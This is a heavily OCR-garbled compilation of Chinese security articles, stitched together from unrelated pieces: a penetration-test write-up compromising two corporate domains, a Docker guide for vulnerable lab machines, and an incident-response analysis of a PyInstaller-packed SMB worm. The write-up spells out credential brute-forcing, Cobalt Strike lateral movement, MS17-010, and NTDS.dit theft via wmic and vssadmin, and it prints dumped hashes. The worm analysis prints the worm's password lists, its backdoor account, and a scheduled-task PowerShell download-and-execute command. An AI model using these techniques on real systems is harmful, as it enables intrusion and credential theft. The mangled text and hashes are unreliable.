我 在 Termux 中 开启 监听 端口 ， UE A 8 现在 已 经 能 够 访问 域 控 ， 并 且 已 经 有 

了 几 个 之 前 登录 Exchange 的 普通 域 账号 。 如 果 按 照常 规 渗透 ， 我 们 可 能 会 通过 net * /domain 来 查询 

域 用 户 、 组 等 信息 。 但 这 里 我 们 是 一 台 Linux， iom E 域 用 户 组 、 域 管理 员 、 域 信任 

关系 呢 ? 我 们 可 以 使 用 Linux 上 的 rpcclient 来 做 这 个 事情 ， 由 于 不 方便 接 入 客户 服务 器 ， 所 以 我 搭建 
一 台 DC 来 演示 这 种 方法 : 





светога СЕС ебед ts еее et СЕС 


当 我 获取 到 所 有 域 信息 以 后 ， 开 始 对 域 控 的 DNS 进行 收集 。 知 道 DNS 记 录 就 基本 能 确定 内 网 有 什么 
资产 ， 以 及 资产 的 位 置 了 。 以 前 我 们 在 域 控 上 使 用 Dnscmd . /EnumRecords domainname .来 收集 
DNS 记录 。 现 在 有 了 这 个 新 方法 ， 只 需要 一 个 普通 域 账号 我 们 就 可 以 收集 域 控 上 的 DNS 记录 : 


(adidnsdump-4xtIn7uUR) dirkjan@ubuntu:-/adidnsdump$ adidnsdump -u itcorp\\testuser tcorp-de.tnternal.corp 
Password: 
Connecting to host. 

[>] Binding to host 
[+] Bind OK 

| Querying zone for records 
{+] Found 17 records 
(adtdnsdump-4Xl1Jn7UR) dirkjangubuntu:-/adtdasdunps head records.csv 


A,wpad,16.1.1.1 
A,testpwn,192.168.111.12 
A,testpm,192.168.111.12 
A, test, 16.0.6.16 
?,notinternal,? 
A,newhost,10.1.1.1 
?,ICORP-W10,? 
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现在 我 有 了 目标 的 全 部 域 账号 ， 组 ， 域 管 ， 域 信任 关系 等 信息 ， 知 道 了 网 络 中 存在 两 个 域 ， 一 个 集 
团 的 A 域 和 一 个 分 公司 的 B 域 ， 以 及 内 网 的 资产 分 部 情况 。 


我 没有 继续 从 内 网 渗透 ， | 到 的 运 维 组 账号 进行 整理 ， 然 后 从 外 部 Exchange 的 EWS 接 口 
进行 爆破 。 最 终 成 功 获得 了 2 个 运 维 人 员 的 邮箱 密码 。 登 录 这 两 个 人 的 集团 邮箱 ， ae 
中 发 现 了 分 公司 B 域 的 服务 "iind 其 中 就 有 分 公司 域 控 的 本 地 管理 员 账 号 和 密码 ， 后 面 我 们 就 叫 
这 个 人 TL 吧 。TL 属 于 集团 ， 但 他 同时 也 负责 管理 分 公司 的 域 控 。 


使 用 impacket 套 件 中 的 wmiexec.py 在 Linux 上 远程 连接 B 域 的 域 控 域 控 执 行 命令 ， 并 使 用 CS 上 线 ， 
ЖЕ НАН, 





Cobalt Strike View Attacks Reporting Help 


поп а= 0 at AO Gehl Pa аө 


ferna nternal + 2907 computer not pid 


b 


ytes 


[+] received password hashes 


Adainistrator:500:aad3b435b51404eeaad3b4t35b5l404ee :Sbai ao debofb209 іБ4д4еТбас1?сс1445::: 
Счезї:901:аа43Ь435Ь51404ееаа43Ь435Ь51404ее:3146сїе041бае931Ь73с5947е0<089с0::: 
krbtgt:502:aad3b435b51404ecaad3b435b51404ee 257 ddf912167605bldccf 2161 43bebdl9: :: 
Reborn:1001:aad3b435b51404eeand3b435bS1404ee 5 2c8462d5 1054 Ge aabG2a3e4F49e2770:: : 
Libing :1105:aad3b439b5140 4eeaad3b435b5 140 4ee ;0f05c8d8d54a02ef64f56424c2ei8f84: 1 : 
ТЇН-АШҮ}5ҮЕА541$:1002:ла43Ь435Ь51404еела43Ь435Ь51404ее:аесес®беЬе2сс4е{са4531634Ь{71#42::: 

| [WIN-4WVJSVFAS4T] Reborn */8224 last: 13s 


| 
之 后 开启 Socks 代 理 ，3389 连 接 服务 器 ， 在 上 面 翻 了 一 波 ， 看 看 有 没有 集团 域 控 的 线索 。 
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:-4 proxychains rdesktop 192.168.2.116 
proxyChains:3.1 (http://proxychains.sf.net) 
Autos cted keyboard map en-us 


|5: сћа <> mM :1050.----.192.168.2.110:3389-«»-»-OK 
£RROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized 


> 

|S-chain| -<> NRW, 1080 -<><>-192.168.2.110:3389-<><>-0K 

Connection established using SSL 

WARNING: Remote desktop does not support colour depth 24; falling back to 16 





rdesktop - 192.168.2.110 o0 
PETIT - 9 x 


登录 服务 器 以 后 继续 使 用 这 个 管理 员 账 号 横向 移动 ， 使 用 这 个 账号 打下 了 分 公司 的 Exchange 等 多 人 台 
服务 器 。 使 用 CobaltStrike 横 向 移动 非常 方便 ，Windows 通 过 命令 横向 移动 的 方法 他 都 支持 ， 
WMI、Psexec、WinRM， 它 还 可 以 使 用 make _token 创 建 Token 和 窃取 steal_token，Linux 的 话 支持 
SSH 和 SSH-KEY。 如 果 执 行 成 功 ， 会 直接 在 控制 台 上 线 。 


сабай Sirka View ¿maqa Жери нер 


пй BSe etre Gebh= fa BO 





到 这 里 目标 分 公司 基本 就 被 打 穿 了 。 下 面 开 始 往 集团 域 控 移 动 。 我 已 经 有 了 集团 TL 的 域 账号 (之 前 
登录 集团 Exchange 邮 箱 的 账号 ) ， 这 里 使 用 到 一 个 叫 Hunter 的 工具 ， 它 可 以 查看 当前 用 户 在 域内 哪 
台 主 机 上 具有 LocalAdmin 权 限 、 以 及 可 以 访问 的 共享 资源 。 先 生成 目标 内 网 IP 段 : 


for Л 96i in (1,1,255) do @echo 192.168.1.96i >> host.txt 
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ADesktopiemd exe 





SUNSET Ф 
{ol Reading hosts fron file 
[°] Coafigeration safernation 
MOST. 77 168.88. 158 
05 белетеп 6.3 
Ramain Controller 
Werkwtation er Server 
* ləqqrdon Users 
ree “HACHE\ зова" "< logged on 
» Sessions established 
User “joha” from client "АЛТО? 968.88, 1527 Teme 
* Shared resources 
XA1972.168.88.1S0388M1M5 Мо Read access 
92, 168, 88, 15601С5 Ne Bead access 
УМРУ 16B. 88. 150304 ега Me Read access 
a ІР addresses 
fw +ddcess 192. t48. 88.1598 


(е) Coafigeratson íofermation 
HOST: 192.163.38, 151 
OS #rrysien 82 
Merkstation ar Server 
= Leqgeden Users 
User “HACHE\;obn” as logged on. 
* Sessions eotabdlished 
User “jeha™ from сіпеві “AN192.168.88.1527 Tome: 
* Shared resources 
NAEP? 168,88 15 1\ ROM Read Recess! 
\NOF2 ТАВ BRL ISINCS Веаф Access 
NAGS? 168, 88 15 ts есу Read Access! 
“СІР Rddresses 
Руа address S97. 168.88 151 
\AT97, 168.98 


[+] Configuration iaformation 

8951: 497.168.408.157 

OS Version 6.1 

Werkstation or Server 
= Leqgrden Users 
[ITI ANTI as logged on, 
* Sessions established 
User “jeha” fram client 55192. 168 88. 982° fine 
* Shared resources 
DYIMIIMIMISATI IL Read TITTI] 
RASET 2 168.88 157305 Read Accens! 
NAN197 168. BB, 15230 егу Bead Access! 
* (f Rddresses 
Puh address 192.148.88.15? 


[°] Confiquration iafornation 

KOSI: 197.968.938.153 

Ü$ LITT 6.1 

Werkytatioa er Server 
* Leggeden Users 
User “HACME Voba” s logged on. 
* Sessieas established 
User “john” from client "ANII? 968.88, 152" 
* Shared resources 
MINIMI LU Me Read access 
қамдан атты“ Me Brad access 
малы ГҮ Me Bead access 
ж IP Addresses 
IPuh address 192.168.88.153 


С \Osers\joha\esktop? 





当时 在 内 网 中 并 没有 找到 当前 用 户 为 LocalAdmin 权 限 的 主机 。 接 下 来 我 使 用 PowerView 来 定位 域 管 
登陆 过 的 机 器 。 
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PS C: Nisers \weborn\Desktop\PoverSploit-master\PoverSploit-master> net group “do 


“ 


ain adnir “domain 
ake re 


+ 


i 


119 test .con 


Reborn 


rs Хе born \Desktop\PoverSploit-master\PoverSploit-master> Get -NetCompute 
Invoke-UserHunter -usernane reborn 


JserDonain : TEST 

serNane : Reborn 

conputerNane : WMIN-4MUJS5UFR547.test.con 
TPAddress : 192.168.1.110 

essionFron : 
jessionFronNane 
‚оса1йатіп 


JserDonain : TEST 
JserNane : Reborn 
;omputerNane : UIN-4MUJSUFAS547.test.con 
IPRddress : 192.168.1.118 
Ч ionFron : 
ionFronmNane 
Loca lAdmin 


serDonain : TEST 

JserNane : Reborn 

compute rNane : WIN-IGH2EACARAB test con 
1PAddress > 192.168.1.111 





然后 使 用 MS-17-010 打 下 ，Mimikat 成 功 抓 取 域 管 密码 ， 进 入 集团 域 控 。 远 程 利用 windows 自 带 的 工 
具 wmic 和 vssadmin 导 出 域 控 HASH ， 再 使 用 secretdump 解 密 。 


wmic /node:domain-ip /user:\ /password: process call create "ста /c vssadmin create shadow 
/for=C: 2>&1" wmic /node: domain-ip /иѕег:* lpassword: process call create "cmd /с copy \? 
\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds. dit 
2>&1" wmic /node: domain-ip /user:* /password:* process call create "cmd /c copy \? 
\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SY STEM 
C:\temp\SYSTEM.hive 2>&1" secretdump -system SYSTEM -ndts ndts.dit local 


e 
ea 


& da 


secretsdump.py System SYSTEM -ntds ntds.dit local 
Impacket v@.9.13 Copyright 2902 15 Core Securi 
Target system bootKey: Oxf17de20622d8f84a93fd539655295 
Dumping D in Credentials (domain\uid:rid: imhash:nthash) 
Search r pekList, be patient 
Pek f and decrypted: Oxf88c8e5$36e6ae409e523f9bbal769C9 
Read and decrypting hashes from ntds. dit 
Ladmin: 509: аа830435051494еезадзь435051404ее : 3eeaf89dfdee3s4bbadseaba7641id 


:43610: аа0304350514094ееаад30435051404ее: с817862308202218а9#6944е070176070::: 
42304: аа030435051404ееаадзь435651404ее: 907е#041601#04##с55се204#36001414 
769а690675еБ?0сс84689144000221 
762515: аай30435051404ееаабзь435Ь51404ее : Беб89ес1414306030701абр?!Ьа24Ы8с: : : 
:61858: аай36435051404ееаадз3ь43551494ее: 332с914007947#130е0361#7а53897ас:: 
:69933:a3a03b435b51404eeaad3b435b51404ee:6f5a7bcc7bc3c696b6bb63127dbcd701: 
$:54333:;aad3b435b51404eeaad3b435b51404ee:927d46910f3b4120c6bbe0cS55bf5652cd: 
378:83ad81952C966b43aad3b435b51464ee:8a952bf5139a3ff3cCdf56e9667b7712d3 
D$:1599:aad3b435b51404eeaad3b435b51404ee:9888eb2bt0@el2eb07333badd31d4de0e 
.9348.3303b435b51404eeaad3b435b51494ee;398206168332df3db7653915223d996c¢ 
2279:77917969ddc19026e9abe422824bc68b5 : 4693с21930а017#19029141797044831а: 
2280 :а1е421 3а041(447са511419е2730:еб5е0с 76746 07ae9b18ea9ad 
а478104е741сае3113е64713064315:7с30454697843409648а14ее36508с4 


11791: b8e7c3aflall3a240aadl3cef95553db: 7 f6b3ablca917ce576e¢e578297a4723 





::11792:87020501931397180с84а4сай91742{е: 0041801с5923178290е0171с#6902азз 


至 此 ， 这 次 渗透 就 结束 了 ， 集 团 总 部 和 分 公司 基本 上 全 部 打 穿 。 
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Docker 极 速 入 门 


本 文 主要 目的 是 以 最 快 的 方式 带领 没 接触 过 Docker 的 小 伙伴 迅速 掌握 几 个 方便 、 快 捷 的 Docker 命 
令 ， 然 后 可 以 简单 的 用 这 些 命令 进行 靶 机 、 实 验 环境 的 搭建 。 重 点 是 快速 上 手 。 





首先 需要 了 解 2 点 : 1. 什 么 是 容器 技术 : 


容器 技术 是 一 种 类 似 于 传统 虚拟 机 的 虚拟 化 技术 ， 但 是 更 加 轻 量化 。 


2. 什 么 是 Docker: 
Docker 是 容器 技术 中 的 一 种 ， 也 用 的 最 多 ， 但 是 容器 并 不 止 这 一 种 ， 比 如 还 有 rkt 等 。 
下 面 以 搭建 一 个 简单 的 wordpress 站 点 为 例子 ， 从 0 开始 讲解 。 
Part 1: 最 最 最 基础 命令 注 : 
боске 9109 ERS, ХЕ Ж 
docker 命 令 前 面 往往 需要 以 ‘docker ' FH 


docker 命 令 需要 root 权 限 


1.docker search 镜像 名 


在 docker hub 上 搜索 指定 镜像 ， 例 如 : 
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docker search centos7 


2.docker pull 镜像 名 称 


找到 需要 的 镜像 后 ， 用 该 命令 进行 下 载 ， 一 般 系统 镜像 也 就 两 三 百 M。 


[root@localhost Desktop]# docker pull ansible/centos7- 


Using default tag: latest 








3.docker images 


查看 本 地 当前 存在 的 镜像 


ihost Desktop]# docker images 


cmd executi 


-361944737de 
914779875919 
20863a0721b4 
376!2себее14 
452а96481с<30 
е934аа#с2206 





адо 
адо 
> ago 
адо 


weeks aqo 
months ago 


TAG 是 容器 的 标签 ， 用 来 区 分 不 同 的 容器 ， 如 果 不 填写 的 话 默 认 是 latest， 如 果 本 地 不 存在 latest 版 


本 则 会 自行 下 载 。 


IMAGE ID 是 镜像 的 16 位 短 ID 


4.docker run -itd —name 容器 名 称 -p 主机 端口 :容器 端口 -p…… 镜像 名 称 :标签 /bin/bash 


这 条 命令 基本 能 满足 环境 的 搭建 了 ， 既 然 是 快速 上 手 所 以 先 不 用 在 意 每 个 参数 的 含义 。 


-p 是 用 来 映射 端口 的 ， 不 需要 映射 的 情况 下 可 以 忽略 。 





例如 : 





{root@localhost Desktop]& docker гип eitd.--name reboot .p 81:80 0 Ы /bin/bash 


€t 71ab2b51cee3a5fc8035b6ecc644afcd401c137092547b968c52779f6c88c0-. 
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这 样 就 成 功 创建 了 一 个 centos 的 容器 ， 并 将 容器 的 80 端 口 映射 到 主机 的 81 端 口上 。 
下 面 这 一 长 串 是 容器 的 完整 1D. 


5.docker ps 
列 出 当前 正在 运行 的 容器 ， 例 如 : 





6.docker stop/start 容器 名 /ID 


停止 或 启动 容器 ， 若 是 填写 容器 名 则 要 全 写 上 去 ， 如 果 用 的 是 ID, 这 里 的 ID 并 不 需要 写 完整 的 ID 或 者 
16 位 短 ID, 只 需要 能 与 其 他 容器 区 分 开 即 可 ， 就 算 你 只 写 第 一 个 字符 都 是 可 以 的 ， 只 要 能 区 分 开 。 





7.docker ps -a 


列 出 所 有 的 容器 ， 包 括 运行 中 的 和 停止 的 





8.docker attach 容器 名 /ID 


# docker start reboot 


root@localhost Desktop]# docker attach reboot 
"TERI [rootaec71ab2b57ce /]# B 





进入 后 可 以 看 到 区 域名 称 变 成 了 容器 的 短 ID 
9.ctrl+d 

退出 并 停止 容器 
[rootaec71ab2b57ce /]# exit 


[root@localhost Desktop]# docker attach reboot 
You cannot attach to a stopped container, start it first 





再 次 连接 会 提示 容器 已 经 停止。 
10.ctrl+p ( 按 完 放 开 ) +q 


[root@localhost Desktop]# docker attach reboot 
[rootQec71ab2b57ce /]# read escape sequence 


[rootalocalhost Desktop]# docker attach; reboot 
退出 而 不 停止 容器 。， [root@ec7lab2b57ce /]# 





11. 进 入 容器 后 ， 往 往 容器 中 会 缺少 个 别 常用 命令 ， 例 如 ifconfig、wget 等 ,只 需要 正常 下 载 即 可 。 然 
后 就 是 正常 的 下 载 搭建 wordpress 所 需 的 环境 。 例 如 这 里 为 了 方便 我 直接 使 用 现成 的 集成 环境 : 


wget 


2110 


tar zxvf lanmp v3.tar.gz 

sh lanmp.sh 

然后 选择 1 进行 下 载 即 可 。 

完成 后 httpd 和 mysqld 默 认 已 经 启动 


然后 退出 容器 。 


12.docker cp 主机 中 的 文件 目录 容器 名 : 容器 中 的 目录 
将 文件 从 主机 拷贝 到 容器 中 





13. 然 后 就 是 在 容器 中 按照 搭建 环境 的 步骤 去 进行 就 可 以 了 。 


最 后 用 ifconfig 查 看 一 下 容器 的 ip 即 可 在 主机 中 直接 访问 对 应 的 站 点 了 ， 若 是 没有 安装 ifconfig 的 话 ， 
可 以 在 容器 外 使 用 命令 docker inspect 容器 名 | grep IPAddress 


查看 容器 信息 ， 里 面 有 ip: 

[rootalocalhost Desktop]# docker attach reboot 

[rootgec71ab2b57ce /]4 ifconfig 

bash: ifconfig: command not found 

{root@ec7lab2b57ce /]4 read escape sequence 

{root@localhost Desktop]# docker inspect reboot | grep IPAddress 
"Secondary es": null, 
; 547254720227 

Mo Y OC 47-02% 





[root@localhost Desktop]# | 


若是 搭建 在 虚拟 机 中 的 直接 在 物理 机 上 访问 虚拟 机 IP: 81 端 口 即 可 访问 到 了 《这 里 忽略 防火 墙 的 问 
题 ) 


Part 2: 快 速 搭建 靶 机 由 于 docker 技 术 很 受 欢 迎 ， 所 以 网 上 已 经 有 很 多 现成 的 环境 可 供 下 载 使 用 ， 例 
如 vulhub、vulstudy 等 。 


下 面 以 vulstudy 为 例 ， 讲 解 下 如 何 使 用 : 
注 : docker-compose 的 安装 教程 网 上 很 多 ， 我 就 不 更 述 了 。 


1. 下 图 是 vulstudy 目 录 中 的 文件 ， 可 以 看 到 有 一 个 docker-compose.yml 文 件 ,在 这 里 我 们 只 需要 运行 
docker-compose up -d 即 可 同时 创建 所 有 目录 中 存在 的 靶 机 环境 ， 当 然 ， 这 个 过 程 会 有 点 慢 ， 因 为 
每 个 靶 机 环境 中 并 不 包含 相应 镜像 文件 ， 下 载 这 些 文件 的 操作 被 写 到 了 每 个 环境 对 应 的 
Dockerfile( 用 来 描述 如 何 创 建 镜像 的 过 程 的 文件 ) 中 。 会 先 去 执行 这 些 Dockerfile 创 建 镜像 ， 然 后 才 
运行 它们 。 
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[root@localhost vulstudy]# 11 


root root 

root root 

root root 

root root :14 docker-compose.yml 
root root : 

root root 

root root 

root root 

root root AE 

root root :14 README .md 
root root 

root root 

root root 

root root 

root root 

root root 


М) М & М GJ М = М М М М М == М FN) М2 





2. 下 图 是 每 个 环境 单独 的 目录 内 容 ， 以 DVWA 为 例 : 
[root@localhost DVWA]# ls 
docker-compose.yml Dockerfile php.ini run.sh 





docker-compose.yml 中 记录 了 容器 启动 时 所 要 进行 的 一 些 配置 : 
[root@localhost DVWA]# cat docker-compose.yml 
version: '2' 
services: 
web: 
#build: 


image: cOnyl/dvwa:v1.9 
ports: 
- "80:80" 
[root@localhost DVWA]# | 





例如 端口 那里 ， 设 置 的 就 是 端口 映射 ， 可 以 在 使 用 之 前 自己 根据 需要 进行 修改 。 

要 单独 创建 靶 机 的 话 ， 对 于 存在 Dockerfile 文 件 的 ， 需 要 先 到 目录 下 执行 如 下 命令 先 创建 镜像 
docker build -t 要 命名 的 镜像 名 称 . (注意 这 里 有 一 个 ' 点 '， 并 且 前 面 有 空格 ) 

然后 : 

docker-compose up -d 

按 .yml 文 件 创建 容器 。 

最 后 根据 映射 的 端口 或 者 iP 进行 访问 就 可 以 了 。 
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记 一 次 应 急 响 应 样本 分 析 
0x01 概述 


前 两 天 应 了 急 ， 抓 了 一 个 样本 ，py 打 包 的 exe， 今 年 的 应 急 发 现 挺 多 样本 都 是 py 打包 的 ， 分 享 一 些 
技巧 吧 ， 知 道 的 就 关 掉 这 篇 文章 就 好 了 。 


0x02 分 析 过 程 
反 编译 


首先 用 python pyinstaller 打包 的 exe 有 几 个 特点 : 1、 特 别 大 ，2、 有 个 类 似 小 鸟 一 样 的 图 标 。 
Jb svchost.exe 


当然 配合 ida 打 开 ， 通 过 关键 字 搜 索 pyinstall 也 能 够 进行 判断 。 


2 гаан & Ф Enter the search substring 

7 гдан 

* гаан String PYINSTALL ім 
“гдай 

7 .rdaté Сапсе! 1 





7 .rdaté 
^ rdata:0042... 0000001 с Error creating child process!\n 

2 .rdata:0042.. 0000000Е с CreateProcessW 

27 .rdata:0042.. 0000001Е с Мо error messages generated.\n 


paee ARAA Doa DDODODOE..........C........... EarmatMassaggML....... e : 
| - rdata:0042.. 00000024 © Pyinstaller: FormatMessageW failed. 
1227 .rdata:0042... 0000002D 226 Pyinstaller: руі win32 utils to utf8 failed. 


ednata ANNAD плалалта A barna 20 


反 编 译 过 程 中 需要 几 个 东西 ， 一 个 是 pyi-archive viewer ， 这 个 东西 的 作用 就 是 搜索 用 
pyinstaller 打包 的 exe 中 提取 相关 可 执行 文件 中 的 各 种 py 代码 ， 而 且 安装 很 简单 ， 通 过 下 面 的 命令 
安装 之 后 就 自 带 这 个 东西 了 。 


pip install pyinstaller 


使 用 方法 如 下 图 ，x 是 解压 文件 ， 选 择 要 导出 东西 ， 这 里 我 选择 i， 然 后 选择 导出 文件 ， 导 出 文件 需 
要 选择 x.pyc 文 件 。 





6 pyi-archive viewer svchost.exe 

pos, length, uncompressed, iscompressed, type, name 

[(0, 168, 234, 1, 'm', u'struct'), 

(168, 1165, 2767, 1, 'm', u'pyimod01 os path'), 

(1333, 4425, 12791, 1, 'm', u'pyimod02 archive'), 

(5758, 7556, 23658, 1, 'm', u'pyimod03 importers'), 

(13314, 1886, _'5', u'pyiboo. tstrap'), 
(15200, 1110930, 2486013, 1, 's', 

91827—;—t^7weryptu-etbher.. AES. pyd'), 


ты 
U: go Up one level 
0 «name»: open embedded archive name 
X <name>: extract name 
Q: quit 
Буз 
xtract name? ii 
to filename? 2.pyc 





pyc 是 py 的 字 节 码 文件 ，pyinstaller ££3T&pycBSBz, 2=:%1#русёутадіс ПЕЧ а]. PRONE 
要 手工 修复 ，hex 打 开 ， 在 6300 之 前 先 加 上 magic 头 ， 内 容 为 \x03\xf3\x0d\x0a， 再 补 上 时 间 戳 的 
话 ， 时 间 惟 可 以 是 4 个 字 节 随意 ， 保 存 。 





Q3F3000A 0102030) 


ала ы een 


63000000 00000000 00330000 00400000 0073Е215 00006400 00640100 6С00005А 00006501 | 
00540200 6503005A 04006505 00540600 6507005A 08006509 005A0A00 650B005A 0С006500 0054А0Е00 650F0054 | 
10006511 005A1200 6513005A 14006515 005A1600 6517005A 18006519 005A1A00 651B005A 1C00651D 005А1Е00 | 
651F005A 20006521 00542200 6500006A 23005424 00650000 6A25005A 26006400 00640100 6C27005A 27006527 | 
00642800 54290064 00006401 006C2A00 5A2A0065 2A006A2B 005A2C00 64000064 01006C2D 00542000 6520006А | 


2Е005А2Ғ 00652000 6А20005А 30006520 00643100 54320065 20006А33 005А3400 6520006А 35005А36 00652000 | 


然后 通过 下 面 命令 安装 uncompyle 


pip install uncompyle 


只 执行 uncompyle6 2.pyc > 2.py 即 可 反 编 译 回 py 代码 。 


# llnk3r@llnk3r.local: ww Hy pei. = р, ШЕ LOE ІМ.) 
Б.з: (14:36:46) 

6 uncompyle6 2.рус > 2.ру 

# llnk3r@llnk3r.local: «алара thy әр „рй а =e ШЙ» [үрү IDEE. 
Ш." р выр з (14:37:26) 

С cat 2.py 


# uncompyle6 version 3.2.3 

# Python bytecode 2.7 (62211) 

# Decompiled from: Python 2.7.15 (default, Nov 27 2018, 21:24:58) 
# [GCC 4.2.1 Compatible Apple LLVM 10.0.0 (clang-1000.11.45.5)] 
# Embedded file name: ii.py 

# Compiled at: 1972-02-19 08:06:25 

import subprocess 
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样本 分 析 
样本 中 有 部 分 定义 的 混淆 ， 我 给 他 全 蔡 换 掉 ! 


pnQmOEeSqxdJITNciXvRyWLVuHjMYs 
pnQmOEeSqxdJ ITNci XvRyWLVuH jMYk 
pnQmOEeSqxdJITNciXvRyWLVuH Т 


pnQmOEeSqxdJITNciXvRyWLVuHjMYB = 
pnQmOEeSqxdJITNciXvRyWLVuHjMYA = 


pnQmOEeSqxdJITNciXvRyWLVuHjMYC 
pnQmOEeSqxdJITNciXvRyWLVuHjMYD 


pnQmOEeSqxdJITNciXvRyWLVuHjMYg = 


pnQmOEeSqxdJITNciXvRyWLVuH jMlr 
pnQmOEeSqxdJITNci XvRyWLVuH jMI Y 
pnQmOEeSqxdJITNciXvRyWLVuH;jMl b 
pnQmOEeSqxdJITNciXvRyWLVuHjMLF 


pnQmOEeSqxdJITNciXvRyWLVuHjMlh = 


pnQmOEeSqxdJ ITNciXvRyWL VuHjMI t 


pnQmOEeSqxdJITNci XvRyWL Мин jMlw 
pnQmOEeSqxdJITNci XVRyWLVuHjMLG 
pnQmOEeSqxdJITNciXvRyWLVuHjMrl 
pnQmOEeSqxdJ ITNci XvVRyWLVuHjMr Y 


list 
set 
xrange 
float 
None 
Exception 
ord 
range 
False 
Тгие 
тіп 
zip 
len 


= Open 
pnQmOEeSqxdJITNciXvRyWLVuHjM1f = 


str 
setattr 
int 


subprocess .PIPE 
subprocess .Popen 





直接 进入 正题 ! ! ! ， 下 面 这 部 分 为 这 个 代码 中 自 带 的 硬 编码 字典 。 


арда = [019231680 1/24 7 14922168521 1/245 TOD GB 2537242 r 19271683. 1724: 


userlist = ['', 'Administrator', 'user', 'admin', ‘test’, 'hp', 'guest'] 
userlist2 = ['', 'Administrator', 'admin'] 
passlist - ['', '123456', 'password', 'qwerty', '12345678', '123456789', '123', 
b 
上 传 minikatz 脚 本 





前 面 都 是 一 些 铺 垫 ， 这 里 开始 进入 正题 ， 还 是 一 段 自 看， 这 下 面 设置 一 个 循环 ， 判 断 network 是 否 在 





find_ip0 方 法 中 ， 然 后 创建 一 个 线程 ， 调 用 scansmb 方法 进行 操作 。 
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var - 1 


e var == 1: 

print 'start scan' 

if ‘exe’ in dl: : 

| network in find ірО: 

print network 
ip, cidr = network.split('/') 
cidr = int(cidr) 
host_bits = 32 - cidr 


l struct.unpack('»I', socket.inet_aton(ip))[@] 
start = i >> host bits << host bits 


= 1 | (1 << host bits) 1 
^ i in range(start + 1, end) 
semaphore1.acquire() 
ip = socket. inet _ntoa(struct.pack('>I', iN 
{+1 = threading. Thread(target=scansmb, args-(ip, 445)) 
‘Serrstartey” 


time. ѕ51еер(1) 


print ‘smb over sleep 2005" 
time.sleep(5) 








先 看 看 find_ip 方法 主要 使 用 ipconfig fall ， 判 断 本 地 网 卡 当 前 有 哪些 网 段 ， 然 后 将 这 些 网 站 变 成 
х.х.х.1124 的 子 网 形式 。 然 后 再 通过 netstat -na 命令 检查 当前 内 网 中 有 哪些 ip 和 其 进行 通信 ， 去 掉 
一 些 本 地 监听 ip， 组 成 一 个 iplist 。 


9-3T[0-9TITTOTT?T 


rlopen('http ip.com 
= ipp2.split Q] + 7." + ipp2.split 
append(ippi 
| Cipp? 


iplist)) 
list. index) 





再 看 看 scansmb 方法 ， 在 scansmb 中 分 别 看 几 个 方法 scan、validate、check_ip、validate2。 
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blip, 
zal semaphore1 
scan(ip, 445) == 1 
f scan(ip, 65 
print 'exp IP 


| validate(ip, '1' 


check ірбір, 1 


validate2(ip, '3' 


сетарһоге1. release()| 


首先 先 看 看 scan P3238, scan 实际 上 就 是 调用 tcp 的 逻辑 ， 输 入 ip 以 及 端口 信息 ， 发 起 tcp 连 接 请 
求 ， 如 果 可 以 连接 的 上 ， 就 返回 1， 否 则 返回 0， 到 这 一 步 实际 上 可 以 大 胆 猜 测 一 下 ， 如 果 中 招 这 个 
病毒 ， 本 地 会 监听 65533 端 口 。 


Hef scanGip, p): 
global timeout 
= SOCket.socket(socket.AF INET, socket.SOCK STREAM) 
s.settimeout(float(timeout) if timeout else None) 
try: 
s.connect((ip, p)) 
return 1 
except Exception as e: 
return 0 


validate 和 validate2 函 数 的 作用 实际 上 很 像 ， 作 用 就 是 创建 一 个 定时 任务 去 执行 一 个 powershell 命 
令 以 及 他 的 恶意 样本 。 


t\\windows\\Bluetooths” /tr "powershell -ep 


HIAaQBuAGCAKAAnAGgAdABOAHAAOgAvACBAdgAuAGIA 
p, d, fe).run(ip): 


te /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn \\Microsoft\\windows\\Bluetooths” 7t hell “ер 
bypass 
SQBFAF gATAAOAE4AZQB3ACOATWBi AGOAZQB j AHQAT ABOAGUAGAAUAF CAZQB i AEMAbABpAGUAbgBOACKALGBKAGB/ GwAbwB hAGQACWBOAHT AaQBuAGcAKAANAGgAdABOAHAAOgAVACBAdgAUAGIA 
ZQBHAGGAGAAUAGMADWB tACBAdgAnACS AJ SAFUAUNBFAFIARABPAEDADOBJAEAAKQA«" /FR&C:N Nw \\temp\\sychost.exe', u, '', d, fr, 
*00000000000000000000000000000000:' + n).runCip) 
print 'SMB Succ!‘ 


解码 这 部 分 powershell 命 令 





cmd.exe /c schtasks 


解码 之 后 是 这 个 


cmd .exe /c schtasks 


再 看 看 check_ip(ip,1) 这 
exploit2、exploit3。 


f final response[9] 
print '[ 


exploit(ip, А 


print ' 


| ехріо1%2Сір, 


print ' 
exploit 


' % (їр, 


, 'k8h3d', 


/create /ru system /sc MINUTE /mo /st /tn 


/create /ru system /sc MINUTE /mo /st /tn 


ж 


人 函数 ， 主 要 部 分 是 下 面 ， 判 断 操作 系统 的 版 本 ， 分 别 执行 exploit、 


final_response d final_response[11] ATUM fínal response[12] 


os) 


'к843]95]#57', 


sc, int(random.randint(5, 13) 


again ' 


, 'k8h3d', 'к893]957#57', tg) 


print "по user2" 


k2.release() 


nt ' 


time.sleep(6) 


print 'exp again ' 


exploit(ip, Nor 


, 'k8h3d', 'k8d3j9SjFS7", tg) 


print "по user3' 


lock2. release() 


lif "Windows Server 2008" 
if scan(ip, 65533) == 
print '[+] exploit. 
try: 
exploit(ip, N 
ept: 


ir 


print "по user’ 


xploit3(ip, 


print 'exp again 
exploit(ip, None, 'k8h3d', 


except: 


n os: 


‘+ ipe' win2k8* 


'k8h3d', 'k8d3j9SjfS7', tg) 


sc, int(r 


'k8d3J9SjfS7', tg) 


print 'no user 2' 





lock3.release() 


except: 





先 跟 进 exploit ， 利 用 
会 根据 操作 系统 版 本 的 不 


conn.login(USERNAME, 


病毒 创建 的 后 门 账号 k8h3d/k8d3j9SjfS7 进行 smb 登陆 ， 在 exploit 方法 中 


同 ， 选 择 不 同 的 payload 进 行 操作 。 


PASSWORD, maxBufferSize-4356) 
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继续 往 下 走 会 调用 smb_pwn 这 个 方法 ， 由 于 我 们 目前 的 target 目 标 是 1， 所 以 进入 的 是 技术 是 下 面 
第 二 张 图 部 分 的 操作 ， 也 就 是 将 C 盘 全 部 共享 出 来 。 


smb.pwn(conn, info['arch'], tg) 


"PCTXTHANDLE ТОКЕМ OFFSET ' 
iserAndGroupsOffset 
